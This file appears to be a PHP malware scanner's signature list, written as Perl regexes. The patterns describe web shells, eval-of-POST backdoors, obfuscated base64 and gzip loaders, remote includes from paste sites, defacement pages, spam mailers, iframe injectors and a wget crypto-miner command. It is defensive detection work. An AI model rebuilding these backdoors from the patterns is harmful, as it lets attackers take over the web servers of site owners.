qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\"([A-z0-9]{1,20})\_([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=\s+strtolower\(\$([A-z0-9]{1,20})\[\d\d\]\..+?\$([A-z0-9]{1,20})\s+\=strtoupper\(\$([A-z0-9]{1,20})\[\d\]\..+?\{\s+eval\(\$([A-z0-9]{1,20})\(.+?\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\"([A-z0-9]{1,20})\_\"\s+\;\$([A-z0-9]{1,20})\s+\=\s+strtoupper\(\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\.\$([A-z0-9]{1,20})\[\d\]\.\s+\$([A-z0-9]{1,20})\[\d\]\s+\)\;\s+if\(\s+isset\(\s+\$\{\$([A-z0-9]{1,20})\}\[\s+\'([A-z0-9]{1,20})\'\s+\]\)\)\s+\{\s+eval\(\$\{\s+\$([A-z0-9]{1,20})\}\s+\[\s+\'([A-z0-9]{1,20})\'\s+\]\s+\)\s+\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?strtoupper\(\$([A-z0-9]{1,20})\[.+?isset\(.+?eval\(.+?\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?strtoupper\(\$([A-z0-9]{1,20})\[.+?isset\(.+?eval\(.+?\}\?>/is,
qr/<\?php\s+\$.+?\'s\'\.\'t\'\.\'r\'\.\'r\'\.\'e\'\.\'v\'\;\$.+?array\(.+?eval.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?strtoupper.+?isset\(.+?eval\(.+?\[\'([A-z0-9]{1,20})\'\].+?\?>/is,
qr/<\?php\s+\$.+?\'gzu\'.+?array\(.+?eval\(.+?\?>/is,
qr/<\?php\s+\$.+?\'bas\'.+?array\(.+?eval\(.+?\?>/is,
qr/<\?php\s+\@eval\(base64\_decode\(([A-z0-9]{20,})\)\)\;\?>/is,
qr/<\?php.+?\$\{\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"\}.+?\?>/is,
qr/<\?php\s+\@error\_reporting\(0\)\;\@ini\_set\(.+?\{eval\(mcrypt\_decrypt\(MCRYPT\_RIJNDAEL\_256.+?\]\)\,MCRYPT\_MODE\_ECB\)\)\;\}exit\;\?>/is,
qr/<\?php.+?eval\(base64\_decode\(str\_rot13\(strrev\(base64\_decode\(str\_rot13\(\$\_POST\[\'.+?\'\]\)\)\)\)\)\)\;.+?print\s+\$pageData\;\s+\}\s+curl\_close\(\$ch\)\;\s+\?>/is,
qr/<\?php\s+\/\*\*.+?\@package\s+WordPress.+?\*\/\s+\@eval\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\s+\?>/is,
qr/function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\{if\(is\_array\(\$([A-z0-9]{1,20})\)\)\{foreach\(\$([A-z0-9]{1,20})\s+as.+?\$([A-z0-9]{1,20})\=base64\_decode\(\$([A-z0-9]{1,20})\)\;eval\(\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\=null\;\}.+?if\(empty\(\$\_SERVER\)\)\$\_SERVER\=\$HTTP\_SERVER\_VARS\;array\_map\(\"([A-z0-9]{1,20})\"\,\$\_SERVER\)\;/is,
qr/<\?php\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\"\\x.+?\$GLOBALS\[\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\.\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\.\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\..+?return\s+\$GLOBALS\[\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\.\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\.\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\..+?eval\(\$([A-z0-9]{1,20})\[\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\]\)\;\s+\}\s+exit\(\)\;\s+\}/is,
qr/<\?php.+?\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})b([A-z0-9]{1,20})a([A-z0-9]{1,20})s([A-z0-9]{1,20})e([A-z0-9]{1,20})6([A-z0-9]{1,20})4([A-z0-9]{1,20})\_([A-z0-9]{1,20})d([A-z0-9]{1,20})e([A-z0-9]{1,20})c([A-z0-9]{1,20})o([A-z0-9]{1,20})d([A-z0-9]{1,20})e([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=str\_ireplace\(\"\w\"\,.+?user\_error\(\$([A-z0-9]{1,20})\,E\_USER\_ERROR\)\;.+?\/\*\s+([A-z0-9]{1,20})\s+\*\/\s+\?>/is,
qr/<\?php\s+eval\(eval\(\"\\\$\_([A-z0-9]{20,})\s+\=\s+\\x.+?([A-z0-9]{1,20})\s+\:\s+\'\s+\.\s+\\\$\_([A-z0-9]{20,})\;\}\"\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'c\'\;\$([A-z0-9]{1,20})\=\'n\'\;\$([A-z0-9]{1,20})\=\'4\'\;\$([A-z0-9]{1,20})\=\'f\'\;\$([A-z0-9]{1,20})\=\'z\'\;\$([A-z0-9]{1,20})\=\'d\'\;\$([A-z0-9]{1,20})\=\'s\'\;\$([A-z0-9]{1,20})\=\'6\'\;\$([A-z0-9]{1,20})\=\'b\'\;\$([A-z0-9]{1,20})\=\'i\'\;\$([A-z0-9]{1,20})\=\'o\'\;\$([A-z0-9]{1,20})\=\'e\'\;\$([A-z0-9]{1,20})\=\'a\'\;\$([A-z0-9]{1,20})\=\'t\'\;\$([A-z0-9]{1,20})\=\'\_\'\;\$([A-z0-9]{1,20})\=\'l\'\;\$([A-z0-9]{1,20})\=\'g\'\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\;eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(.+?\'\)\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\$\_COOKIE\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\[([A-z0-9]{1,20})\]\;\s+if\(\$([A-z0-9]{1,20})\)\{\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\[([A-z0-9]{1,20})\]\)\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\[([A-z0-9]{1,20})\]\)\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\"\"\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?\'st\'.+?array\(.+?eval\(.+?\;\s+\?>/is,
qr/<\?php\s+eval\(eval\(\"\\\$\_([A-z0-9]{20,})\s+\=\s+\\x.+?\\\"\)\;\s+eval\(\\\$\_([A-z0-9]{20,})\)\;\"\)\)\;/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\{\$([A-z0-9]{1,20})\s+\=\s+\'\'\;\s+for\(\$i\=0\;\s+\$i\s+<\s+strlen\(\$([A-z0-9]{1,20})\)\;\s+\$i\+\+\)\{\$([A-z0-9]{1,20})\s+\.\=\s+isset\(\$.+?\$([A-z0-9]{1,20})\=\"base64\_decode\"\;return\s+\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\}.+\$([A-z0-9]{1,20})\s+\=\s+Array\(\'.+?\)\;\s+eval\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\)\;\?>/is,
qr/<\?php\s+isset\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\s+\&\&\s+\(\$([A-z0-9]{1,20})\=\s+\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\s+\&\&\s+\@preg\_replace\(\'\/([A-z0-9]{1,20})\/\w\'\,\'\@\'\.str\_rot13\(\'riny\'\)\.\'\(\$([A-z0-9]{1,20})\)\'\,\s+\'([A-z0-9]{1,20})\'\)\;/is,
qr/<\?php\s+if\(isset\(\$\_GET\[.+?\]\)\?base64\_decode\(\$\_GET\[\'([A-z0-9]{1,20})\'\]\)\:\'\'\;.+?foreach\(array\(\$([A-z0-9]{1,20})\)\s+as\s+\$([A-z0-9]{1,20})\)\{.+?ob\_end\_flush\(\)\;\s+\}/is,
qr/<\?php\s+if\s+\(md5\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\=\=\=\'.+?if\(isset\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\&\&isset\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\s+\=\s+array\(\$([A-z0-9]{1,20})\.\$\_POST\[\'([A-z0-9]{1,20})\'\].+?array\_walk\(\$([A-z0-9]{1,20})\,\s+strval\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\,s+\'\'\)\;\}\}\s+\?>/is,
qr/function\s+stripDangerousValues\(\$input\)\s+\{.+?\$\_POST\s+\=\s+stripDangerousValues\(\$\_POST\)\;/is,
qr/<\?php.+?\$rootpath\s+\=\s+preg\_replace\(\'\/\(htdocs\|httpdocs\|www\)\(\.\*\)\/\'\,\'\$1\'\,dirname\(\$\_SERVER\[\"SCRIPT\_FILENAME\"\]\)\)\;.+?return\s+\$result\;\s+\}\s+\?>/is,
qr/<\?php\s+\$urls\s+\=\s+array\s+\(\s+\'http\:\/\/.+?\)\;\s+\$URL\s+\=\s+\$urls\[rand\(0\,\s+count\(\$urls\)\s+\-\s+1\)\]\;\s+header\s+\(\"Location\:\s+\$URL\"\)\;\s+\?>/is,
qr/<\?php\s+if\s+\(md5\(\$\_POST\[.+?\'bas\'\.\'e6\'\.\'4\_d\'\.\'ec\'\.\'ode\'\;.+?array\_walk\(.+?\)\;\}\}\s+\?>/is,
qr/<\?php.+?move\_uploaded\_file\(\$file\,\s+\$name\)\;\s+\}else\{\s+\?>.+?action\=\"<\?\$\_SERVER\[\'PHP\_SELF\'\]\?>\">.+?require\_once\(dirname\(\_\_FILE\_\_\)\.DS\.\'index\.php\'\)\;\s+\?>/is,
qr/Goog1e\_analist\_up<\?php\s+\$.+?\)\{eval\(\$.+?\)\{system\(\$.+?\)\{move\_uploaded\_file\(\$\_FILES\[.+?\]\[\'name\'\]\)\;\}\?>/is,
qr/<\?php\s+function\s+d\(\$.+?\$d\.\=chr\(hexdec\(substr\(\$.+?\}\}eval\(d\(\".+?\)\)\;\s+\?>/is,
qr/<style\s+type\=\"text\/css\">.+?Lampungcarding.+?\$currentCMD.+?exit\;\s+\?>.+?<\/title>/is,
qr/<\!\-\-<\?php\s+if\(\@\$\_REQUEST\[.+?Goog1e\_analist\_certs.+?\{eval\(base64\_decode\(\$.+?\)\{move\_uploaded\_file\(\$.+?\?>\-\->/is,
qr/<\?php\s+if\(isset\(\$\_GET\[\'.+?Goog1e\_analist\_certs.+?\]\)\)\{eval\(base64\_decode\(\$\_POST\[.+?\]\)\;\}\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?isset\(.+?eval\(.+?\'([A-z0-9]{1,20})\'.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\".+?\"\;\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$\{\$([A-z0-9]{1,20})\[\d\d\]\.\$([A-z0-9]{1,20})\[\d\d\].+?\{\s+break\;\s+\}\s+\}\s+return\;\s+\}\s+if\s+\(isset\(\$GLOBALS\[.+?\{\s+echo\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\(([A-z0-9]{1,20})\)\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?isset\s+\(.+?eval\s+\(.+?\'([A-z0-9]{1,20})\'.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?isset\s+\(.+?eval\(.+?\'([A-z0-9]{1,20})\'.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20}).+?isset\(.+?eval\s+\(.+?\'([A-z0-9]{1,20})\'.+?\?>/is,
qr/<\?php.+?\$([A-z0-9]{1,20})\s+\=.+?eval\(\"\?>\"\.gzuncompress\(base64\_decode\(\$([A-z0-9]{1,20})\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$.+?\=urldecode\(.+?eval\(\$GLOBALS\[.+?\?><\?php\s+\/\*\s+([A-z0-9]{1,20})\s+\*\/\$.+?eval\(\$.+?\/([A-z0-9]{1,20})\=([A-z0-9]{1,20})\Z/is,
qr/<\?php\s+\$f\s+\=\s+fopen\(.+?echo\s+\"HACKED\s+BY.+?\?>/is,
qr/<\?php\s+\/\*.+?\$homedir\s+\=\s+\'\.\/\'\;.+?case\s+\'upload\'\:\s+\$dest\s+\=\s+relative2absolute\(\$file\[\'name\'\]\,\s+\$directory\)\;.+?\.php\_uname\(\)\.\'<br><\/b>\'\;\s+\?>/is,
qr/<\?php\s+eval\(\$\_POST\[([A-z0-9]{1,20})\]\)\?>/is,
qr/<\?php\s+if\(\!function\_exists\(\'findsysfolder\'\)\)\{function\s+findsysfolder\(\$.+?clearstatcache\(\)\;if\(\!is\_dir\(\$.+?eval\(.+?\)\)\;\?>/is,
qr/<\?php.+?system\s+file\s+do\s+not\s+delete.+?eval\(\$\_\_\_\(\$\_\_\)\)\;/is,
qr/<\?php\s+if\s+\(isset\(\$\_GET\[\"([A-z0-9]{1,20})\"\]\)\)\s+die\(\$\_GET\[\"([A-z0-9]{1,20})\"\]\)\;\s+if\s+\(isset\(\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\)\s+\{\s+eval\(base64\_decode\(\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\)\;\s+exit\;\s+\}\s+\?>/is,
qr/<\?php\s+define\(\'CONFIG_FILE\'\,\s+\'\/images\/config\.db\'\)\;.+?function\s+getLinks\(\$server\_host\,\s+\$server\_port\,\s+\$path\,\s+\$key\).+?process\(\)\;\s+\?>/is,
qr/<\?php.+?Array\(\)\;global\s+\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+\$GLOBALS\;\$\{\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"\}\[.+?\{eval\/\*([A-z0-9]{1,20})\*\/\(\$.+?\}exit\(\)\;\}\s+\?>/is,
qr/<\?php.+?\]\)\?base64\_decode\(\$\_GET\[.+?ob\_end\_flush\(\)\;/is,
qr/\*\/\s+\$\w\=\@\$\w\(\'\'\,strrev\(\'\;\)\)\]B2D2C\_PTTH\[REVRES\_\$\(edoced\_46esab\(lave\'\)\)\;\@\$\w\(\)\;\s+\/\*/is,
qr/\#\!\/usr\/bin\/perl\s+\-w\s+\'\'\=\~\(\'\(\?\{\'\.\(\'.+?\'\)\.\'\$\/\}\)\'\);/is,
qr/\*\/if\(\@isset\(\$\_SERVER\[HTTP\_25F0C\]\)\)\{\@eval\(base64\_decode\(\$\_SERVER\[HTTP\_25F0C\]\)\)\;\}\/\*/is,
qr/<\?php\s+\$.+?\'str\'\.\'rev\'\;\$.+?array\(.+?eval\(.+?\?>/is,
qr/<\?php\s+\$.+?\'gzun\'\.\s+\'comp\'\.\s+\'ress\'\;\$.+?\'ba\'\s+\.\'se\'\s+\.\'64\'\s+\.\'\_d\'\s+\.\'ec\'\s+\.\'od\'\s+\.\'e\'\;\$.+?\'im\'\s+\.\'pl\'\s+\.\'od\'\s+\.\'e\'\;\$.+?array\(.+?eval\(.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\\x66lat\\x65\(b\"\.chr\(97\)\.\"se64\"\.chr\(95\)\.\"\"\.chr\(100\)\..+?\"([0-9]{1,20})\"\);/is,
qr/<\?php.+?Leaf\s+PHP\s+Mailer.+?leafmailer\.pw.+?print\s+\'<\/body>\'\;\s+\?>/is,
qr/<u\s+style\=\"position\:\s+absolute\;\s+width\:\s+1px\;\s+height\:\s+1px\;\s+margin\:\s+0\;\s+top\:\s+\-1000px\;\s+left\:\s+\-5000px\;\s+overflow\:\s+hidden\;\">.+?pornstar.+?gay.+?www\..+?<\/h1><\/a>.+?<\/u>/is,
qr/<\?php\s+error\_reporting\(.+?\@include\(\$\_FILES\[\'u\'\]\[\'tmp\_name\'\]\)\;.+?header\(\"HTTP\/1\.0\s+404.+?exit\(\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\@assert\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?array\(\'bas\'\s+\,\'e64\'\s+\,\'\_de\'\s+\,\'cod\'\s+\,\'e\'\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+array\(\'gzun\'\,\s+\'comp\'\,\s+\'ress\'\)\s+\;\$.+?eval.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?array\(\'bas\'\s+\,\'e64\'\s+\,\'\_de\'\s+\,\'cod\'\s+\,\'e\'\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+array\(\'gz\'\,\s+\'un\'\,\s+\'co\'\,\s+\'mp\'\,\s+\'re\'\,\s+\'ss\'\)\s+\;\$.+?eval.+?\?>/is,
qr/<\?php\s+ignore\_user\_abort\(1\)\;.+?echo\s+ex\(\"cd\s+\/dev\/shm\;rm\s+([A-z0-9]{1,20})\.txt\"\)\;\s+\?>/is,
qr/<\?php\s+echo\s+\"test\"\;\s+\?>/is,
qr/<\?php\s+print\s+\"\_\_code\_\_\"\;\s+\?>/is,
qr/<\?php\s+system\(\$\_GET\[\"([A-z0-9]{1,20})\"\]\)\;\s+\?>/is,
qr/<\?php\s+system\(\$\_SERVER\[\"HTTP\_SHELL\"\]\)\;\s+\?>/is,
qr/<\?php\s+eval\(stripslashes\(\$\_REQUEST\[\".+?\"\]\)\)\;\s+\?>/is,
qr/<\?php\s+\@include\(\"http\:\/\/pastie\.org\/([A-z0-9]{1,20})\.txt\"\)\;\s+\?>/is,
qr/<\?php\s+\@include\(\"http\:\/\/.+?\.txt\"\)\;\s+\?>/is,
qr/<\?php\s+\$files\s+\=\s+\@\$\_FILES\[\"files\"\]\;.+?OK\-Click\s+here\!.+?<title>Upload\s+files<\/title>.+?\?>/is,
qr/<\?php\s+ignore\_user\_abort\(true\)\;.+?\$unzip\_path\s+\=\s+\$dir\_path\.\'unzip\.php\'\;.+?echo\s+getURL\(\$url\)\;\s+\}\s+exit\;\s+\}\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+function\s+http\_get\(\$url\)\{.+?\/wp\-includes\/wp\-footer\.php.+?\/wp\-admin\/shapes\.php.+?https\:\/\/hastebin\.com\/raw\/.+?fclose\(\$op3\)\;\s+\?>/is,
qr/<\?php\s+function\s+http\_get\(\$url\)\{.+?\/wp\-includes\/wp\-footer\.php.+?\/wp\-admin\/shapes\.php.+?https\:\/\/pastebin\.com\/raw\/.+?\?>/is,
qr/<\?php\s+if\(\$\_POST\[\'Copy\'\]\)\{\s+\$\_\=\"b\"\/\*\*\/\.\"ase64\_decode\"\;\s+preg\_replace\(\"\/\^\/e\"\,\$\_\(\".+?\"\)\,0\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$this\->zipname\s+\=\s+\$p\_zipname\;.+?\$archive\s+\=\s+new\s+PclZip\(\"orppxie\.zip\"\)\;.+?else\s+\{\s+die\(\"1425756856\"\)\;\s+\}/is,
qr/<\?php.+?\/\/PASSWORD\s+CONFIGURATION.+?if\(\!function\_exists\(.+?\)\)\;\?>\'\)\)\;\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;ob\_clean\(\)\;if\(\!function\_exists\(\'str\_ireplace\'\)\)\{function\s+str\_ireplace\(\$a\,\$b\,\$c\)\{return\s+trim\(preg\_replace\(\"\/\"\.addcslashes\(.+?str\_replace\(\'\{.+?\;\}\}\?>/is,
qr/RewriteEngine\s+On\s+RewriteRule\s+\^\(topic\|hot\|updated\|free\|review\|rewrite\)\-\(\.\*\)\s+index\.php\?\$1\=\$2\s+\[L\]/is,
qr/<\?php\s+function\s+DirFilesR\(\$dir\).+?<title><\?php\s+echo\s+\$\_SERVER\[\'SCRIPT\_FILENAME\'\]\;\?><\/title>.+?\$k\+\+\;\s+\}\s+\?>\s+<\/table>/is,
qr/<HTML>.+?<title>Hacked\s+by\s+Mister\s+Spy<\/title>.+?dQ\_\-z9pTRL6tA2kqbnXH6A\.jpg\'>/is,
qr/<\?php.+?\?>\%x.+?\/\(\.\*\)\/epreg\_replace.+?\$([A-z0-9]{1,20})\s+\=\s+explode\(chr\(\(.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php.+?\$mosimage\_session\s+\=.+?\$mosimage\_category\_session\(\"\/\.\*\/e\"\,\"\\x.+?\\x3B\"\,\"\.\"\)\;\s+\?>/is,
qr/\$([A-z0-9]{1,20})\s+\=\s+\"\\x.+?\$([A-z0-9]{1,20})\s+\=\s+\"\\x.+?\@eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(.+?\)\)\)\)\;/is,
qr/<\?php\s+ini\_set\(\'include\_path\'\,dirname\(\_\_FILE\_\_\)\)\;function.+?\'sprintf\'\)\=\=false\)\?false\:exit\(\)\:exit\(\)\:exit\(\)\:exit\(\)\)\;\}function.+?\)\)\{unlink\(\$.+?\}\s+ini\_set\(\'include\_path\'\,\'\.\'\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\;/is,
qr/<\?php\s+\$auth\_pass\=\"\".+?x3B\"\,\"\.\"\)\;\?>/is,
qr/<\?php\s+\$\w\s+\=\s+\"b\"\.\"\"\.\"as\"\.\"e\"\.\"\"\.\"\"\.\"6\"\.\"4\"\.\"\_\"\.\"de\"\.\"\"\.\"c\"\.\"o\"\.\s+\"\"\.\"d\"\.\"e\"\;\s+assert\(\$\w\(.+?\)\)\;\s+\?>/is,
qr/<\?php\s+if\(\!isset\(\$GLOBALS\[\"\\x.+?\]\)\)\s+\{\s+\$ua\=strtolower\(\$\_SERVER\[\"\\x.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+class.+?\=base64\_DEcODE\(self\:\:\$\_.+?\(\'\_\'\.\'.+?\'\)\]\)\;endif\;exit\;/is,
qr/<\?php.+?Black\-ID\@W\.Cn.+?preg\_replace\(\"\\x.+?\"\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\'\)\;if\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\)\)\=\=\$.+?\*\/\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(false\,\$([A-z0-9]{1,20})\(\$.+?\'\;/is,
qr/<\?php\s+if\(empty\(\$\_GET\[\'ineedthispage\'\]\)\)\{ini\_set\(\'display\_errors\'\,\"Off\"\)\;ignore\_user\_abort\(.+?\}\}closedir\(\$dir\)\;rmdir\(\$directory\)\;\}\;\s+\/\/item\->alias\s+\?>/is,
qr/<\?php.+?\$pathToDor\s+\=\s+\"\/nsw\-uk\".+?\$cookie\_name\s+\=\s+\'UTCSESSID\'\;.+?setcookie\(\$cookie\_name\,md5\(uniqid\(\)\)\,0\,\'\/\'\,\$cookieDomain\)\;.+?\$curl\_loops\=0\;\s+return\s+\$data\;.+?\?>/is,
qr/<\?php\s+if\(strpos\(strtolower\(\$\_SERVER\[\'REQUEST\_URI\'\]\)\,\'nsw\-uk\'\)\)\{\s+include\(getcwd\(\)\.\'\/version\.php\'\)\;\s+exit\;\}\s+\?>/is,
qr/<\?php\s+if\s+\(\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\{eval\(base64\_decode\(\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\)\;exit\;\}\s+if\(isset\(\$\_GET\[\"([A-z0-9]{1,20})\"\]\)\)\{echo\s+\"([A-z0-9]{1,20})\s+\:\s+([A-z0-9]{1,20})\=\"\;exit\;\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\)\)eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;.+?([A-z0-9]{1,20})\'\;/is,
qr/<\?php.+?if\s+\(\!isset\(\$\_COOKIE\[\'.+?\$compressed\=base64\_decode\(\$cookieData\).+?\$str\=\"<h1>403\s+Forbidden<\/h1><\!\-\-\s+token\:.+?return\s+array\(\$resultHeaders\,\s+\$body\)\;\s+}/is,
qr/<\?PHP\s+\$login.+?\$md5\_pass\s+\=.+?eval\(gzinflate\(base64\_decode\(.+?\?>/is,
qr/<\?\$sInjectPHP\s+\=\s+\"<iframe\s+src\=.+?function\s+Infect\(\$sDir\).+?closedir\(\$hDir\)\;\s+\}\s+\}\s+\?>/is,
qr/<iframe\s+src\=\"http\:\/\/.+?\.php\?.+?\"\s+width\=\"0\"\s+height\=\"0\"\s+frameborder\=\"0\"><\/iframe>/is,
qr/<\?\s+\@include\s+\$\_GET\[\"([A-z0-9]{1,20})\"\]\;\s+\?>/is,
qr/<\?php\s+\@include\(\"http\:\/\/.+?(r57|c99)\?\"\)\;\s+\?>/is,
qr/<\?php\s+\@include\(\"http\:\/\/.+?bypass\.txt\?\?\"\)\;\s+\?>/is,
qr/<\?php\s+echo\s+base64\_decode\(\"([A-z0-9]{1,20})\"\)\;\s+\@include\(\"http\:\/\/.+?\"\)\;\s+\?>/is,
qr/<\?php\s+echo\s+\"MFTeaM\"\;\@include\(\"http\:\/\/.+?\"\)\;\s+\?>/is,
qr/<\?php.+?preg\_replace\(\"\\x2F.+?\\x3B\"\,\"\\x2E\"\)\;\s+\?>/is,
qr/<\?php\s+\@ob\_start\(\)\;.+?if\s+\(\!isset\(\$\_COOKIE\[\'key\'\]\)\)\s+\{.+?\$func\=\"cr\"\.\"eat\"\.\"e\_fun\"\.\"cti\"\.\"on\"\;.+?\$remove\_tags\(\$content\)\;.+?return\s+\$content\;\s+\}/is,
qr/<\?php\s+eval\s+\(\$\_POST\[\w\]\)\;\s+\?>/is,
qr/<\?php\s+eval\(gzuncompress\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+eval\(stripslashes\(\@\$\_POST\[\(chr\(([0-9]{1,20})\)\.chr\(([0-9]{1,20})\)\)\]\)\)\;\?>/is,
qr/<\?\s+\$GLOBALS\[.+?\]\=Array\(base64\_decode\(.+?\)\;return\s+base64\_decode\(\$\w\[\$\w\]\)\;\}\s+\?>/is,
qr/<\?php\s+\$\_\d\=\_([0-9]{1,20})\(([0-9]{1,20})\).+?\.\$\_\d\[round\(\d\+\d\.\d\+\d\.\d\+\d\.\d\+\d\.\d\+\d\.\d\)\]\,\$\_\d\,\_([0-9]{1,20})\(([0-9]{1,20})\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{32})\"\;\$([A-z0-9]{1,20})\=\".+?\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\)\)\;\?>/is,
qr/<\?php\s+\$command\s+\=\s+\"wget\s+http\:\/\/.+?cryptonight.+?\{\s+echo\s+execCommand\(\$command\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$tag\s+\=\s+\'\s+\*\s+\@package\s+general\'\;\s+\$code\s+\=\s+<<<\'CODE\'\s+\*\/.+?CODE\;\s+\$injectType\s+\=\s+1\;.+?unlink\(\_\_FILE\_\_\)\;\s+\?>/is,
qr/<\!doctype\s+html>.+?<title>MAILER<\/title>.+?function\s+doset\(\)\s+\{.+?print\s+\"\s+SEND<br>\"\;\s+flush\(\)\;.+?\?>\s+<\/body>\s+<\/html>/is,
qr/<html>\s+<head>\s+<title>Mail<\/title>.+?\$attach\[\$h\]\=\s+base64\_encode\(fread\(\$f\,filesize\(\$HTTP\_POST\_FILES\[\'filename\'\]\[\'tmp\_name\'\]\[\$h\]\)\)\)\;.+?\?>\s+<\/body>\s+<\/html>/is,
